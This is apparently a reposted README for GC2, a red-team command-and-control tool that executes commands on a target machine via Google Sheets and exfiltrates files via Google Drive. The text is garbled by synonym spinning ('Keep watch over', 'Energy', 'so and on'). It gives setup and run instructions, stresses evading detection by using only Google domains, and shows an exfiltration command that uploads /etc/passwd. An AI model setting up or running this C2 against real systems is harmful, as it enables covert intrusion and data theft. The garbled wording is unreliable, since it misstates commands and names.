GC2 (Google Command and Keep watch over) is a Command and Keep watch over device that permits an attacker to execute instructions at the function system the use of Google Sheet and exfiltrates information the use of Google Energy.
This program has been advanced so as to supply a command and control that doesn’t require any particular prepare (like: a customized area, VPS, CDN, …) everywhere Pink Teaming actions.
Moreover, this system will have interaction best with Google’s domain names (*.google.com) to make detection harder.
git clone https://github.com/looCiprian/GC2-sheet
move bring together gc2-sheet.move
Create a brand new google “carrier account”
Create a brand new google “carrier account” the use of https://console.cloud.google.com/, create a .json key file for the carrier account
Permit Google Sheet API and Google Energy API
Permit Google Energy API https://builders.google.com/power/api/v3/enable-drive-api and Google Sheet API https://builders.google.com/sheets/api/quickstart/move
Get ready Google Sheet and Google Energy
Create a brand new Google Sheet and upload the carrier account to the editor group of the spreadsheet (so as to add the carrier account use its e-mail)
Create a brand new Google Energy folder and upload the carrier account to the editor group of the folder (so as to add the carrier account use its e-mail)
Get started the C2
<div magnificence=”snippet-clipboard-content position-relative overflow-auto” data-snippet-clipboard-copy-content=”gc2-sheet –key –sheet –power “>
gc2-sheet --key <GCP carrier account credential file .JSON > --sheet <Google sheet ID> --drive <Google power ID>
PS: you’ll additionally hardcode the parameters during the code, so you’ll add best the executable at the function system (take a look at feedback in root.move and authentication.move)
- Command execution the use of Google Sheet as a console
- Obtain recordsdata at the function the use of Google Energy
- Wisdom exfiltration the use of Google Energy
- Go out
This system will carry out a request to the spreedsheet each 5 sec to test if there are some new instructions.
Instructions should be inserted during the column “A”, and the output it’ll be revealed during the column “B”.
Wisdom exfiltration file
Specific instructions are reserved to accomplish the add and obtain to the objective system
<div magnificence=”snippet-clipboard-content position-relative overflow-auto” data-snippet-clipboard-copy-content=”From Function to Google Energy
add;/and so on/passwd “>
From Function to Google Energy
add;<some distance flung trail>
add;/and so on/passwd